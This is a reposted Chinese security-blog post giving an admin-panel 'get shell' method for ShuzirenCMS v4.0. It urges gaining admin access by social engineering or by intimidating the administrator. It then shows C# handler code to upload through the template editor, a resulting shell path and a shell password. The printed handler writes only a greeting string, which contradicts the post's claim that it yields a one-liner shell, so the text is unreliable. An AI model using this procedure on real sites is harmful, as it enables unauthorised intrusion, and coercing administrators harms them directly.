ShuzirenCMS v4.0 后台Get Shell

admin 2021年4月3日20:07:13评论35 views字数 946阅读3分9秒阅读模式

此漏洞由http://www.t00ls.net/thread-19609-1-1.html引起
楼主Pm我网址后简单看下... 发现Asp Php脚本权限封得死死的整个网站的目录任何一个都不给写入~

测试环境/系统:
数字信息港内容管理系统ShuzirenCMS v4.0 / Windows

不管你社工,自己挖注入,嗅探,恐吓后台管理员要密码  反正要后台权限...

登入后台 > 博客 > 模板管理 > 编辑

上传1.ashx

1.ashx内容:

 


using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
string show="Hey web master,Have a nice day o.O? I hope so! HaHa";
StreamWriter file1= File.CreateText(context.Server.MapPath("4z1.aspx"));
file1.Write(show);
file1.Flush();
file1.Close();
            
        }
    
        public bool IsReusable {
            get {
                return false;
            }
        }
    
    }


访问后生成的一句话路径:
http://路径/4z1.aspx
密码:
RmB321654897123456789

另一个是如果asp权限可写文件
上传aasasa后缀的aspshell

漏洞证明:

 

文章来源于lcx.cc:ShuzirenCMS v4.0 后台Get Shell

相关推荐: 【新闻】百度小范围测试新版搜索结果页

    博主评论:百度小范围测试新版搜索结果页,只有部分地区可见,前几天发现时我还以为是被劫持了!改版后的:简洁谈不上,难看倒是真的,十分十分的难看,一点都不习惯!!我当时发现时的状况:https://lcx.cc/post/401/     8月11日报道:…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:07:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ShuzirenCMS v4.0 后台Get Shellhttps://cn-sec.com/archives/325600.html

发表评论

匿名网友 填写信息